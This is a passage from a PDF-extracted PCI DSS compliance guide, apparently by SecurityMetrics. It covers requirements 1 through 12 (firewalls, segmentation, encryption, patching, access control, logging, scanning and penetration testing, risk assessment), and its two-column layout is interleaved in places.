inside an environment to create isolated network segments. Higher • Difficult to configure properly
security internal network segments are created to limit access to
• Needs to be maintained and reviewed regularly
sensitive data from less secure networks.
Many personal computers come with pre-installed software firewalls. A common mistake regarding firewalls is assuming they are a plug-
This feature must be enabled and configured for any laptop computers and-play technology. After initial installation, additional effort is
that commonly connect to sensitive data networks and are also used almost always necessary to restrict access and protect the CDE.
to connect to the Internet when outside the network.
The end goal of firewall implementation is to prevent potentially
Personal firewalls protect the system they are on, while perimeter harmful traffic from the Internet and other untrusted networks from
firewalls protect entire networks. A personal firewall can be accessing valuable confidential data, and to prevent data from being
configured to permit more or less network traffic, depending on exfiltrated by malicious actors. In ecommerce applications, a firewall
the network to which it is attached. For example, it might allow should be used to limit traffic to essential services needed for a
more types of network traffic when the machine is on the company functioning CDE. By identifying sensitive systems and isolating them
network, but limit it when on public Wi-Fi. through the proper use of firewalls (e.g., network segmentation),
merchants can more precisely control what type of access is allowed
in and out of these zones, and more easily protect payment data.
46 |
1
FIREWALL CONFIGURATION
BEST PRACTICES
NETWORK SEGMENTATION
Merchants often set up flat networks, meaning everything inside For example, install and configure a multi-interface firewall at
the network can connect to everything else. They may have one the edge of your network. From there, create one interface on the
firewall at the edge of their network, but that’s it. There’s no internal firewall dedicated just to the systems that store, process, and
segmentation, making it a flat network. transmit cardholder data. If that interface doesn’t allow any
other traffic in or out of any out-of-scope zones, this is proper
network segmentation.
Flat networks make security difficult because
if an attacker gets inside, they have access Segmentation is not required for you to be compliant with PCI DSS.
to everything. However, if you’re looking for a way to reduce cost, effort, and time,
you may want to consider segmentation.
Initial intrusion in many of recent investigated data breaches began Segmentation can be tricky, especially for those without a technical
in areas of an organization’s network that shouldn’t have given the security background. Consider having a security professional dou-
attacker access to the CDE. For example, since the organization’s ble-check your segmentation work by performing regular, third-party
network was configured as a flat network, it was not difficult for the segmentation checks.
attacker(s) to migrate from the point of entry (e.g., employee laptop,
workstation) to the CDE or other sensitive systems.
48 |
Segmented 1
TEST AND MONITOR CONFIGURATION
Network
Example:
Rules and environments change over time, no matter the size of
your organization. Firewall rules should be reviewed (and revised
when necessary) over the course of a few months whenever your
INTERNET
environment undergoes a significant change and at least every
six months.
FIREWALL
PORTAL DATABASE
WEB DATABASE
APPLICATION CLUSTER
VLAN 1 VLAN 2
SMTP WORKSTATIONS
VLAN 3 VLAN 4
50 |
NOTES 1
REQUIREMENT 1 IT CHECKLIST
Assigned to:___________________________________________________
Assignment date:______________________________________________
Firewall(s)
Requirement 2
Apply Secure Configurations
to All System Components
Out-of-the-box devices, such as routers or POS systems, often Passwords that fall short of these criteria can usually be broken in a
come with factory settings like default usernames and passwords. short time using readily available password-cracking tools.
Defaults make device installation and support easier, but they
also mean every model originates with the same username and
password. Default passwords are easy to guess, and many are
SYSTEM HARDENING
published online.
52 |
2
This way, applications and systems that are not approved for use in
the CDE can be discovered and addressed.
Guide
Guideto
toPCI
PCIDSS
DSSCompliance
Compliance || PCI
PCI DSS
DSS Requirements
Requirements | 53
TIPS FROM AN AUDITOR
Requirement 2:
System Configuration
• Changing default passwords
• Limiting servers to perform a single role Automated tools can simplify the task of enforcing configuration
standards, allowing administrators to quickly discover systems
• Removing or disabling default accounts
that are out of compliance.
54 |
NOTES
REQUIREMENT 2 IT CHECKLIST
Configuration Standards
2
Assigned to:___________________________________________________
Assignment date:______________________________________________
56 |
Requirement 3
Protect Stored Account Data
DATA RESIDES
According to requirement 3, stored card data must be encrypted
using industry-accepted algorithms (e.g., AES-256). The problem
An essential part of eliminating stored card data is using a valid
is many organizations unknowingly store unencrypted primary
card data discovery tool and methodology. These tools help identify
account numbers (PAN), which typically happens because of mis-
the location of an unencrypted PAN, so you can securely delete or
configured software.
encrypt it. They also help identify which processes or flows might
need to be fixed.
Not only must card data be encrypted, but the encryption keys must
also be protected. Not protecting the encryption key location using
Remember, payment card data can easily leak due to poor processes
a solid PCI DSS encryption key management process is like storing
or misconfigured software. Start by looking where you think the data
your house key in your front door lock.
is, and then look where it shouldn’t be.
+3.7 Million
2023 PANSCAN®
DATA ANALYSIS
Storage of unencrypted payment card
data increases an organization’s risk and
liability in the event of a data breach.
Primary Account Numbers found
5%
stored track data (i.e., data
inside magnetic stripe)
86%
of PANscan® users
discovered unencrypted
PAN data
58 |
To accurately craft your CHD flow diagram,
ask yourself:
• What device(s) am I using for • Do I store card data before it’s sent • Is card data backed up on my system?
transactions? A virtual terminal? to the processor for approval? Are backups encrypted? Is the backup
POS system? server at a different data location?
• How does settlement occur? Does
3
• What happens to the card data after settlement occur real time or at the • Where might card data be going
a transaction? end of the day? or moved in processes not part of
authorization and settlement?
• When is data encrypted? Is it even • How is data authorized and returned
encrypted at all? by the processor?
Requirement 3:
Protect Cardholder Data
The more data you keep,
the higher the risk.
BEN CHRISTENSEN
SecurityMetrics Senior Security Analyst
CISSP | CISA | QSA organization. Create data flow diagrams for your entire organiza-
tion (on all information you deem sensitive), not just for your CDE
Don’t keep any data you don’t need. If you only need the last environments. You might miss something if you only focus on the
four numbers of PAN, get rid of the rest! For each element of CDE and CHD.
cardholder data, ask yourself if you really need it or if it is just
nice to have. I have found that some companies have a lot of data In addition, use automated tools that can help you search for
they really don’t need and never ask if the business needs it. The and find unencrypted CHD. You will be surprised by what you
more data you keep, the higher the risk. find outside of your CDE. Run these tools often to ensure data
is where it should be.
IT should work closely with all business groups to decide what
data the company needs, where to store it, and for how long. PCI DSS v4.0 Considerations for Requirement 3
Data retention policies are key to ensuring that your data has the
appropriate controls. Periodic assessments of data retention and As noted above in the PCI DSS v.4.0 summary, Requirement 3 has
data mappings should be performed. Data requirements might a lot of changes. Make sure you understand what elements of
change over time, so check often. cardholder data you are storing and what that means for 4.0.
There are some changes to the encryption requirements in 2025.
It is important to know what data you actually store, process, These changes could take a lot of effort, so start now.
and/or transmit. If you don’t know what you have, it is difficult
to implement the correct controls around it. Data flow mapping Also, review your algorithms and hashing functions as those
helps you understand the data coming into and out of your may be impacted when moving to PCI DSS v.4.0.
60 |
NOTES
REQUIREMENT 3 IT CHECKLIST
Assigned to:___________________________________________________
3
Assignment date:______________________________________________
NOTES
62 |
Requirement 4
Protect Cardholder Data with Strong
Cryptography During Transmission
Over Open, Public Networks
For requirement 4, you need to identify where you send cardholder Examples of applications that might still
data. The following are common places primary account numbers use SSL/early TLS include:
4
(PAN) are sent:
• POS/POI hardware terminals
• Processors
• Virtual payment terminals
• Backup servers
• Back-office servers
• Third parties that store or handle PAN
• Web/application servers
• Outsourced management of systems or infrastructure
• Corporate offices The PCI Council believes that SSL and early TLS
will no longer protect cardholder data.
You need to use encryption and have security policies in place when
you transmit cardholder data over open, public networks.
Your systems may still be using SSL and early TLS, so you should
contact your terminal providers, gateways, service providers,
vendors, and acquiring banks to determine if the applications and
devices you use have this encryption protocol.
Requirement 4:
Sending Data Over Open
And Public Networks
Leverage tools that can
analyze web services and
report any insecure setups.
BEN CHRISTENSEN
SecurityMetrics Senior Security Analyst
CISSP | CISA | QSA
Build off of the data flow diagrams discussed in the tips in Companies should also leverage tools that can analyze web
Requirement 3.3 Know exactly where CHD is coming from and services and report any insecure setups. You may not be aware
being sent to, inside and outside of your organization. Make sure of all your services accessible over the internet. Run these tools
your CHD is encrypted when transmitted over open public networks often to help ensure you are using acceptable protocols and
using strong and industry accepted encryption technologies. encryption strengths.
Are you using strong encryption on all CDE impacting services? PCI DSS v4.0 Considerations for Requirement 4
I have noticed that some companies are still using older technolo-
gies even though the latest is also supported. For example, CDE Some organizations may have a large number of TLS certificates.
web servers using TLS 1.3 or TLS 1.2 are still accepting connections Start inventorying those now and remove those certs not needed.
using TLS 1.1. Disable all insecure protocols and encryption. 2025 seems far off, but it will come quickly. Don’t wait.
64 |
Things You Will Need To Do:
REQUIREMENT 4 IT CHECKLIST
Check all related device configuration for proper
Transmitting Cardholder Data encryption. Check with vendors to make sure supplied
POS/POI devices are encrypting data appropriately
Assigned to:___________________________________________________
Validate that POS/POI devices are not susceptible to
any known exploits. Devices and software used to
Assignment date:______________________________________________
process credit cards need to be PCI DSS compliant
66 |
Requirement 5
Protect All Systems and Networks
from Malicious Software
Requirement 5:
Implement And Update
Your Anti-Malware
System administrators are
responsible for making
sure that their anti-malware
software are up to date.
MICHAEL OHRAN
CISSP | CISA | QSA | SSF | SSL
System administrators have the responsibility of making sure their PCI DSS v4.0 Considerations for Requirement 5
anti-malware software, including the signatures, are up to date.
In PCI DSS v.4.0, Requirement 5 is broadened by using the term
After a software upgrade, verify that signatures are able to be anti-malware instead of anti-virus. Most solutions have already
updated. The new software may use different firewall rules or expanded past simply protecting against “viruses,” but it might be
directory permissions, requiring some system configuration time for a more comprehensive solution.
changes to ensure signature updates continue.
Several new requirements were added. Though not enforced until
PCI DSS requires anti-malware software to be installed on all April 2025, start implementing them sooner. Finding the appropriate
systems that are commonly affected by malware (e.g., Windows). solution to help against phishing attacks will be interesting, and will
While Linux servers are often considered systems not commonly not necessarily be inside the CDE.
affected by malware, it’s highly recommended that anti-malware
software be installed for any Internet-facing Linux servers.
68 |
REQUIREMENT 5 IT CHECKLIST NOTES
Anti-Malware Updates
Assigned to:___________________________________________________
Assignment date:______________________________________________
Application developers will never be perfect, which is why updates Operating system updates often contain essential security
to patch security holes are frequently released. Once a threat enhancements that are specifically intended to correct recently
actor knows they can get through a security hole, they pass that exposed vulnerabilities. When using an unsupported OS that
knowledge to other criminals who could then exploit this weakness doesn’t receive such updates and patches, the vulnerability
until a patch has been deployed. potential increases exponentially.
Quickly implementing security updates is crucial to your Be vigilant about consistently updating software associated with
security posture. Patch all critical components in the card your system. Requirement 6 details that organizations must “install
flow pathway, including: critical patches within a month of release” to maintain compliance.3
Don’t forget about critical software installations like credit card
• Internet browsers payment applications and mobile devices. To stay up to date, ask
your software vendors to put you on their patch and upgrade
• Firewalls
notification list.
• Application software
• Databases
Keep in mind that the more systems,
• POS terminals computers, and apps your company has, the
more vulnerabilities it may be exposed to.
• Operating systems
Older Windows systems can make it difficult for merchants to Another way to stay on top of vulnerabilities is through vulnerability
remain secure, especially when the manufacturer no longer supports scanning, which is arguably the easiest way to discover software patch
a particular operating system or version (e.g., Windows 7, Windows holes that cyber criminals would use to exploit, gain access to, and
Server 2008 R2). compromise an organization.
70 |
ESTABLISH SOFTWARE
DEVELOPMENT PROCESSES WEB APPLICATION FIREWALL PROS
• Immediate response to web application security flaws
If you develop payment applications in house (e.g., ecommerce
websites, POS applications), you must use strict development • Protection for third-party modules used in web applications
processes and secure coding guidelines as outlined in the PCI DSS.
• Deployed as reverse proxies
Don’t forget to develop and test applications according to industry
accepted standards like the Open Web Application Security
6
Project (OWASP).
WEB APPLICATION FIREWALL CONS
• Requires more effort to set up
Be vigilant about consistently updating the
• Possibly break critical business functions (if not careful)
software associated with your system.
• May require some network re-configuration
Requirement 6:
System Updating And
Software Development
72 |
Companies need to embrace the idea of change
control for their software development and
system patching/updating.
Companies need to embrace the idea of change control for their coding practices in their application development process and keep
software development and system patching/updating. There are software code safe from malicious vulnerabilities (e.g., cross-site
four requirements detailed by the PCI Council of what a proper scripting, SQL injection, insecure communications, CSRF).
change control procedure must contain:
Insecure communications, for example, have been in the spotlight
1. Changes must have a documented explanation of what will be since SSL and TLS 1.0 are no longer considered acceptable
impacted by the change. protocols when data is being transmitted over open, public
networks. Everyone should be on TLS 1.2+ now.
2. Changes must have documented approval by authorized parties.
PCI DSS v4.0 Considerations for Requirement 6
3. Changes to an organization’s production environment must
undergo proper iterations of testing and QA before being Requirements have been moved around and grouped together
released into production. where they are related.
4. Change control procedures must always include a back-out or New requirements have been added, notably that all scripts loaded
roll-back procedure in case the updates go awry. onto the payment page of the consumer’s browser must be managed.
New solutions and services are being developed to assist with
When developing software (e.g., web applications), it’s crucial that
organizations adopt industry-accepted standards or best practices Also, a web application firewall is no longer optional.
for coding, such as OWASP. This will guide them in enforcing secure
Software Updates
Assigned to:___________________________________________________
Assignment date:______________________________________________
74 |
Requirement 7
Restrict Access to System
Components and Cardholder
Data by Business Need to Know
include each role, the definition of each role, access to data resources,
current privilege level, and what privilege level is necessary for each
person to perform their normal business responsibilities. Users must Learn More
fit into one of the roles you outline.
MICHAEL OHRAN
CISSP | CISA | QSA | SSF | SSL
This requirement is one of the oldest and most basic parts PCI DSS v4.0 Considerations for Requirement 7
of the PCI DSS (and data security in general).
PCI DSS 4.0 raises the expectations of managing user accounts,
There’s no new trend or solution. But not all organizations system accounts, and access privileges. More frequent reviews
accurately comply with this requirement or have even tried are required. Prepare for the new requirements by thoroughly
role-based access at all. documenting all accounts and related access privileges.
This is all you need to know: don’t give access to people who
don’t need it. Cardholder data and card systems should only be
accessible to those that need that information to do their jobs.
Once you’ve implemented access privileges, make sure to
document it.
76 |
REQUIREMENT 7 IT CHECKLIST NOTES
Assigned to:___________________________________________________
Assignment date:______________________________________________
Required Features:
78 |
IMPLEMENT MULTI-FACTOR
AUTHENTICATION
Guide
Guideto
toPCI
PCIDSS
DSSCompliance
Compliance || PCI
PCI DSS
DSS Requirements
Requirements | 79
A few examples of effective multi-factor authentication for remote
access could include:
PASSWORD
OTP
MOBILE DEVICE
ONE-TIME
PASSWORD
80 |
Example 2: The remote user enters a password and
biometric to log in to a smartphone or laptop. The individual
then provides a single authentication factor (e.g., another
password, digital certificate, signed challenge response) to
connect to the corporate network.
Requirement 8:
Use Unique ID Credentials An easy way to remember complex and long passwords is by using
passphrases. Passphrases are groups of words with spaces in between
(e.g., “Boba Fett in 1983 ROJ was WAY better than 2022 BoBF!”). A
passphrase can contain symbols and upper- and lower-case letters. It
doesn’t have to make sense grammatically. Passphrases are generally
easier to remember but more difficult to crack than shorter passwords.
82 |
REQUIREMENT 8 IT CHECKLIST NOTES
Assigned to:___________________________________________________
Assignment date:______________________________________________
Required Features:
84 |
Requirement 9
Restrict Physical Access
to Cardholder Data
Organizations that use POS systems, PIN pads, and mobile devices
or kiosks are required to do three new things:
86 |
PHYSICAL SECURITY BEST PRACTICES TRAIN EMPLOYEES
EARLY AND OFTEN
Most physical security risks can be prevented with
little effort. Here are a few suggestions to improve your
While you may understand how to protect customer
physical security:
card information, your employees may not. And as
employee turnover is so common, regular security
• While working on your risk assessment, look for
training is crucial to secure your business.
physical security risks.
• Lock all office doors and applicable equipment Social engineering is a serious threat to both
(e.g., mobile devices) when not in use day and night. small and large businesses. A social engineer
uses social interaction to gain access to private
• Require passwords to access computers and
areas, steal information, or perform malicious
mobile devices.
behavior. Employees fall for social engineering
• Encrypt your data or don’t store data on these devices. attacks more often than you may think.
• Keep track of devices that go in and out. Train your employees to question unusual behavior.
9
Establish a communication and response policy
• Have policies in place for stolen equipment
in case of suspicious behavior. Train employees to
(e.g., a good incident response plan).
stop and question anyone who does not work for
• Train staff against social engineering. the company, especially if the person tries to enter
the back office or network areas.
• Limit access to CHD through role-based access.
Requirement 9:
Improve Your
Physical Security
MICHAEL MAUGHAN
SecurityMetrics Security Analyst
CISSP | CISA | QSA
Having electronic access on doors, using cameras to monitor all Today, you see more organizations hosting their systems in
entries and exits to secure areas, implementing multiple levels of outsourced data centers. Data centers generally have great physical
access based on a business need, and approving visitor/employee security because they pay attention to the basics. They use cameras
access are all standard controls for physical security. to monitor all entries and exits, have multiple levels of access
(e.g., lobby, mantrap, hallways, data floors, and cages) to segment
Once you know what systems you need to protect, put controls in physical areas and limit access only to individuals who have been
place that can log and restrict access to them (e.g., badge readers). authorized. They also use different levels of authentication requiring
A good risk assessment would determine an appropriate amount both badge and biometrics (e.g., fingerprint, retina) for access.
of money to spend on controls necessary to mitigate the identified
Digital IP-based cameras are becoming more common, making
risk. Something that companies often overlook is the access given
it easier and more cost effective to deploy and monitor camera
to delivery personnel for a night drop. Do you know if that delivery
systems. These cameras can take snapshots of people and then
person locked the doors when they left?
send those snapshots to security supervisors for verification.
88 |
Once you know what systems you need to
protect, put controls in place that can log
and restrict access to them.
It’s also necessary to protect card-swipe devices. Merchants must Lastly, it’s important to have good security training for your
monitor these devices for tampering or complete replacement. management and employees. Help them understand malicious
Make sure attackers don’t substitute, bypass, or steal your terminal. conduct and motivate them to report suspicious behavior and
9
You and your employees must know what the tamper properties are violations of company policy and procedures.
(e.g., seals, appearance, weight) and test them often. Security best
practice is to mount devices with tamper-resistant stands, screws
and tape. If you are using a validated P2PE solution, make sure
to follow the physical security requirements located in the corre-
sponding P2PE Instruction Manual.11
Assigned to:___________________________________________________
Assignment date:______________________________________________
Things You Will Need To Have: Things You Will Need To Do:
Policies and procedures that limit the access to your Restrict access to any publicly accessible network jack.
physical media and devices used for processing
Keep physical media secure and maintain strict
control over any media being moved within the facility
and outside of it.
NOTES
Keep electronic media in a secure area with limited
access (e.g., a locked office clearly marked “Manage-
ment Only”) and require management approval before
the media is moved from its secure location.
90 |
Things You May Need To Do:
NOTES
System event logs are recorded pieces of information regarding the Logs should be collected and sent to a central location, whether
actions taken on computer systems like firewalls, office computers, an onsite logging server or an online service. Businesses should
or payment applications. review their logs daily to search for errors, anomalies, or suspicious
activities that deviate from the norm.
Log monitoring systems (e.g., Security Information and Event
Management [SIEM] tools) oversee network activity, inspect system From a security perspective, the purpose of a log alert is to act as a
events, alert you to suspicious activity, and store user actions that red flag when something potentially malicious is happening. Reviewing
occur inside your systems. Think of these systems as a lookout, logs regularly helps identify issues in your system. Given the large
providing you with data breach alerts. The raw log files are also amount of log data generated by systems and networking devices, it’s
known as audit records, audit trails, or event logs. impractical to manually review all logs each day; plus, PCI DSS v4.0
requires automated mechanisms to perform audit log reviews.
Most systems and software generate logs including operating
systems, Internet browsers, POS systems, workstations, anti-mal- Log monitoring software takes care of this issue by using rules to
ware, firewalls, and IDS/IPS. Some systems with logging capabili- automate log review and only alert on events that might be real
ties do not automatically enable logging, so it’s important to ensure issues. Often this is done using real-time reporting software that
all systems create and collect logs. Some systems generate logs alerts you via email or text when suspicious actions are detected.
but don’t provide event log management solutions. Be aware of
your system capabilities and install third-party log monitoring and Often, log monitoring software comes with default alerting templates
management software as needed. to optimize monitoring and alerting functions immediately. However,
not everyone’s network and system designs are the same, and
it’s critical to correctly configure what is being monitored and the
alerting threshold rules during setup.
92 |
Organizations should review their logs daily
LOG MANAGEMENT SYSTEM RULES to search for errors, anomalies, or suspicious
activities that deviate from the norm.
Here are some event actions to consider when setting up
your log management system rules:
To take advantage of log management, look at your security strategy
• Password changes and risk assessment and make sure the following steps are taken
care of:
• Unauthorized logins
• New login events • Secure your stored logs so they aren’t maliciously
altered by cybercriminals or accidentally altered
• Malware detection
by well-intentioned employees.
• Malware attacks seen by IDS
• Assign responsible personnel the duty to review logs daily.
• Denial of service attacks
• Set up a team to review suspicious alerts and determine
• Errors on network devices if they are incidents or false positives.
• File name changes • Spend time to create rules for alert generation
(don’t just rely on a template).
• File integrity changes
• Store logs for at least one year, with three months
• System object errors
readily available.
• Data exported
• Frequently check log collection to identify
• Shared access events necessary adjustments.
• Disconnected events • Identify assets, risks, threats, and vulnerabilities and make
sure that all are monitored and settings are configured to
• File auditing 10
generate alerts.
• New service installation
• Confirm everything is being appropriately logged by testing
• New user accounts the alert and monitoring configurations
Requirement 10:
Audit Logs and
Log Monitoring Regular log monitoring means
a quicker response time to
security events and improved
security program effectiveness.
MICHAEL MAUGHAN
SecurityMetrics Security Analyst It is a good idea to test your alerting capabilities as part of your
CISSP | CISA | QSA incident response test to ensure alerts are being generated and
critical systems and applications are being appropriately monitored.
It’s critical that you configure the log monitoring solution correctly
so that the appropriate directories, files, security controls, and To correlate events over multiple systems you must synchronize
events are being monitored. Given the large amount of log data system times. All systems should get their system time from
generated by systems, it can be time intensive to manually analyze internal time servers, which in turn receive time from a trusted
logs (and automated mechanisms to perform audit log reviews will external source.
need to be implemented for PCI DSS v4.0).
PCI DSS requires service providers to implement a process to
You likely need SIEM tools to sift through logs and drill down into detect and respond to failures of critical security controls in a
problems. In the past, SIEM systems were mainly utilized by large timely manner. You need to be able to detect these failures and have
corporations, but solutions for smaller companies are now available. defined incident responses in place. Your response plans not only
need to address the response to fix the problem, but they should
Organizations often struggle with good log review processes. Using also identify risks created by the failure, find root causes, document
SIEM tools can enable you to have real-time alerting to help you lessons learned, and implement any necessary changes to prevent
recognize a current attack and initiate your incident response plan. failures from happening again.
94 |
REQUIREMENT 10 IT CHECKLIST NOTES
Assigned to:___________________________________________________
Assignment date:______________________________________________
10
Things You Will Need To Do:
Keep all audit log records for at least one year and keep
the last three months’ logs readily available for analysis.
This requirement has been included for the following SAQs: SAQ A,
These types of scans and tests are the best line of defense in
SAQ A-EP, SAQ D for Merchant, and SAQ D for Service Providers.
identifying weaknesses, so they can be corrected before deployment.
96 |
PAYMENT PAGE BASICS VULNERABILITY SCANNING VS.
What exactly qualifies as a payment page? PENETRATION TESTING
• A web-based user interface containing one or more form To clarify, vulnerability scanning and penetration testing are two
elements intended to capture account data from a consumer different methods to improve security. Some mistakenly believe
or submit captured account data. The payment page can be vulnerability scans are the same as a professional penetration test.
rendered as any one of:
Here are the two biggest differences:
• A single document or instance,
• A document or component displayed in an inline frame • A vulnerability scan is automated, while a penetration test
within a non-payment page, includes a live person that runs tests against your network.
• Multiple documents or components each containing • A vulnerability scan only identifies vulnerabilities. During a
one or more form elements contained in multiple penetration test, the tester attempts to exploit discovered
inline frames within a nonpayment page. vulnerabilities to gain access to secure systems or
sensitive data.
For example, an SAQ A merchant uses a third-party iframe to
perform payment capture, this would qualify as a payment page
(and they would need to comply with requirement 11.6.1).
Vulnerability scans and penetration tests work
together to identify weaknesses and encourage
However, if the merchant’s website is configured to redirect the
overall system security.
customer’s browser to the TPSP’s payment acceptance page, they
would mark this requirement as Not Applicable.
A vulnerability scan is an automated, high-level test that looks for Vulnerability scanning is an automated method to identify
and reports potential vulnerabilities in systems and applications. potentially harmful vulnerabilities, so you can remediate them
to improve system security.
PCI DSS requires two types of vulnerability scanning: internal and
external. Think of your environment as a house. External vulnerability Typically, vulnerability scanning tools will generate an extensive
scanning is like checking to see if doors and windows are locked, while report of discovered vulnerabilities with references for further
internal vulnerability scanning is like testing to see if bedroom and research on these vulnerabilities. Some reports even offer
bathroom doors have locks that would prevent an intruder from moving suggestions on how to fix discovered issues, and links to fixes
to more sensitive areas once they have gained access to the house. and patches where available.
An external vulnerability scan is performed from outside of your Remember, when it comes to vulnerability scanning, your
network and identifies known weaknesses in perimeter network organization is responsible for scan configuration, actual scanning,
devices, servers, or applications. All external IPs and domains findings review, and vulnerability remediation. For PCI compliance,
exposed in the CDE, or that can provide access to the CDE, are passing quarterly vulnerability scan reports must be provided. This
required to be scanned by a PCI Approved Scanning Vendor (ASV) means that if a vulnerability is discovered during a scan that is a
at least quarterly. A PCI ASV is required to go through a rigorous high risk, or that causes the scan to fail, you must work to resolve
yearly recertification process, during which each ASV runs their the issue, and then re-scan the affected system to show it was fixed.
scanning tool against PCI Council-provided sites planted with
vulnerabilities to test which ones the tool finds and which ones
it misses.
VULNERABILITY SCANNING PROS
An internal vulnerability scan is performed from within your network, • Quick, high-level look at potential vulnerabilities
and it looks at other hosts on the same network to identify internal
• Very affordable compared to penetration testing
vulnerabilities. These scans are also required to be performed at
least quarterly for PCI compliance. There are a variety of tools to • Automatic (can be automated to run weekly,
help you comply with internal vulnerability scan requirements. For monthly, quarterly)
example, you can:
• Purchase an internal vulnerability scanning tool from your VULNERABILITY SCANNING CONS
ASV or another provider.
• False positives
• Download an open source vulnerability scanning tool.
• Businesses must manually research and correct
Keep in mind that the scanning tool you use still needs to be each vulnerability before testing again
configured by a security expert after you purchase or download it.
• Does not confirm if a vulnerability is exploitable
98 |
PENETRATION TESTING BASICS
Penetration testing takes vulnerability detection to the next level. PENETRATION TESTING PROS
Penetration testers are people that analyze networks and systems,
• Rules out false positives
identify potential vulnerabilities, misconfigurations, or coding errors,
and try to exploit them. In simple terms, penetration testers attempt • Live, manual tests mean more
to break into your company’s network by exploiting weaknesses the accurate and thorough results
same way a hacker would. However, unlike a hacker, the penetration
tester documents and communicates their methods and findings so
that you can fix vulnerabilities before an actual hacker gets to them. PENETRATION TESTING CONS
• Time (1 day to 3 weeks)
The objective of a network penetration A type of network penetration testing, the The objective of an application penetration
test is to identify security issues with the objective of a segmentation check is to test is to identify security issues resulting from
design, implementation, and maintenance of confirm that firewalls and other controls are insecure development practices in the design,
servers, workstations, and network services. preventing access to the cardholder data coding, and deployment of the software.
PCI compliance requires these tests be environment (CDE) and other sensitive envi-
performed from outside, as well as within, ronments as intended. Basically, segmenta-
your environment, targeting the cardholder tion checks confirm if network segmentation Commonly identified issues include:
data environment at all access points. is set up properly. Remember that the PCI
• Injection vulnerabilities (e.g., SQL
definition of a segmented CDE means no
injection, remote code execution)
communication is allowed from non-trusted
Commonly identified issues include: or out-of-scope networks and systems. • Cross-site scripting
vulnerabilities (XSS)
• Misconfigured software,
If you use network segmentation to isolate
firewalls, and operating systems • Broken authentication (i.e., the
your CDE and reduce PCI scope, segmenta-
log-in panel can be bypassed)
• Outdated, vulnerable, software tion checks are an annual requirement. For
and operating systems service providers that use segmentation to • Broken authorization (i.e.,
limit PCI scope, you’re required to conduct low-level accounts can access
• Insecure protocols
penetration tests on segmentation controls high-level functionality)
• Weak authentication practices every six months.
• Improper error handling (sensitive
• Overly permissive access controls data, or data useful to hackers,
exposed in error messages)
Commonly identified issues include:
• Vulnerable or outdated plugins,
• TCP/UDP access is allowed
libraries, and other application
where it is not expected
dependencies
• ICMP (ping) access is allowed
where it should not be
100 |
Mobile Penetration Test Wireless Penetration Test Social Engineering
The objective of a mobile application The objective of a wireless penetration test Social engineering assessments are used to
penetration test is to identify security issues is to identify misconfigurations of authorized test the effectiveness of an organization’s
resulting from insecuredevelopment practices wireless infrastructure and the presence of security awareness training. The tester will
in the design, coding, and publishing of the unauthorized access points. use typical business scenarios and normal,
software that supports a mobile application. everyday interactions with personnel to
find those that do not follow established
Commonly identified issues include: security policies and procedures, or are
Commonly identified issues include: not security minded. The goal of the tester
• Insecure wireless
is that of an attacker: to take advantage
• Insecure local storage encryption standards
of the employee and trick them into doing
• Information disclosures • Weak encryption passphrase something they shouldn’t.
Requirement 11:
Testing Security Perform a penetration test at
least yearly and after major
network changes.
DAVID PAGE
SecurityMetrics Senior Security Analyst
CISSP | CISA | QSA
If your organization is required to be PCI compliant, don’t procrasti- PCI DSS v4.0 Considerations for Requirement 11
nate beginning the penetration test process. Finding and engaging a
good penetration testing partner can take more time than you realize. Like other areas of the PCI DSS, the version 4.0 update includes
additions and clarifications that impact an organization’s vulnerabili-
In performing PCI assessments, it is common to see an organization’s ty discovery, testing, and treatment programs.
penetration testing process, from start to finish, taking as long as
everything else involved in the assessment combined. If you wait until New internal vulnerability scanning requirements now call for “au-
your QSA is onsite, or until your SAQ is due, to discuss penetration thenticated” internal scanning. This allows the scanner to simulate a
test scope, methodology, and objectives, you may be unable to meet user with access to systems, to better catch vulnerabilities that exist
your PCI compliance deadlines. Start thinking about penetration in applications and other software that require users to log in first.
testing months before your PCI deadlines.
Organizations are now required to define and document their own
Remember, the required annual penetration test can begin before penetration testing methodology. By doing this, you will be able to
your PCI assessment, but you can’t be validated as PCI compliant clearly communicate infrastructure details, unique attributes of
before the testing is finished. systems and applications, and testing goals and requirements to
the penetration testing partner you engage. This allows for more
effective testing and more useful results, all in an effort to better
secure your environment.
102 |
REQUIREMENT 11 IT CHECKLIST
Security Testing
NOTES
Assigned to:___________________________________________________
Assignment date:______________________________________________
104 |
NOTES
Things You May Need To Do:
11
FORMALLY DOCUMENT
BUSINESS PRACTICES
Not only do policies and procedures need to be followed, they also Documents you’ll want to include in your security policy:
need to be documented. Policies should be written down and easily
accessible to all employees. • Employee manuals
106 |
ESTABLISH A RISK
ASSESSMENT PROCESS
PCI requires all entities to perform an annual risk assessment Part of a risk assessment is to assign a ranking or score to identified
that identifies critical assets, threats, vulnerabilities, and risks. risks. This will help establish priorities and provide direction on what
This exercise helps organizations identify, prioritize, and manage vulnerabilities you should address first. Methodically identifying,
information security risks. ranking, and mitigating risks can decrease the time an attacker can
access and negatively affect your systems, and over time closes the
Organizations that take a proactive approach to security will use door to the attack.
internal and external resources to identify critical assets, assess
vulnerabilities and threats against those assets, and implement a
risk management plan to mitigate those threats.
If you think your employees know how to secure cardholder data and
what they’re required to do to be compliant, you’re probably mistaken. By informing employees about and holding them
In fact, most breaches can be traced back to human error. Although accountable for their responsibilities, you can
most workers aren’t malicious, they are human, and often forget better protect your business and customers.
security best practices or don’t know exactly what is expected of them.
Often, people are the weakest link in your overall security scheme.
108 |
Employees need to be given specific rules and regular training.
A security awareness program that includes regular training (e.g.,
brief monthly training or communications) will remind them of the
importance of security, especially keeping them up to date with
current security policies and practices. Here are some tips to help
employees protect your sensitive data:
12
Requirement 12:
PCI Compliance Basics
DAVID PAGE
SecurityMetrics Senior Security Analyst
CISSP | CISA | QSA
The risk assessment is where a lot of organizations struggle with Another area of difficulty, especially for small organizations, is
PCI compliance. Many treat it as simply another item on the to-do putting together a comprehensive and relevant security awareness
list. In reality, a risk assessment can be the most important part of program. Don’t be afraid of what you don’t know! Even if you aren’t
your overall security and compliance program, since it helps you a security expert yourself, there is a wealth of security-related
identify systems, third parties, business processes, and people that information available online, and many resources that make it easy
are in scope for PCI compliance. Too many companies approach to present a polished training program to your employees. This is
PCI as simply an “IT issue” and are surprised when they realize PCI one area where the help of an outside security expert or partner can
compliance touches a lot of other business processes and practices. be valuable, since security threats are constantly evolving.
If you aren’t doing a formal risk assessment now and are intimidated
by the process, start small and plan to increase the scope of the PCI DSS v4.0 Considerations for Requirement 12
review each year.
The annual risk assessment requirement still calls for the identifica-
tion of assets, threats, and likelihood of exploitation to occur, but it
A risk assessment is a great starting point clarifies that the risk assessment is to be targeted toward each PCI
